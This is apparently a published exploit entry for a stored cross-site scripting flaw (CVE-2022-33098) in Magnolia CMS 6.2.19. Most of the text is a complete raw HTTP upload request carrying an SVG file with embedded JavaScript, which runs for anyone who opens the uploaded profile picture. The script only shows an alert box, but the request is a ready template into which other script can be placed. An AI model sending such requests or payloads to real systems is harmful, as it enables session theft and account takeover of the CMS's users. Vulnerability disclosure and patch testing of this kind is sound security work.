Magnolia CMS 6.2.19 Cross Site Scripting

# Exploit Title: Magnolia CMS <= 6.2.19 - Stored Cross-Site Scripting (XSS)# Date: 08/05/2022# Exploit Author: Giulio Garzia 'Ozozuz'# Vendor Homepage: https://www.magnolia-cms.com/# Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip# Version: 6.2.19# Tested on: Linux, Windows, Docker# CVE : CVE-2022-33098ExplanationMalicious user with the permissions to upload profile picture for a contact, can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource.===== REQUEST =====POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908Content-Length: 620Connection: closeCookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34DUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: same-origin-----------------------------399178799522967017241464837908Content-Disposition: form-data; name="140_file"; filename="xss.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  <script type="text/javascript">    alert('POC - Magnolia CMS');  </script></svg>-----------------------------399178799522967017241464837908--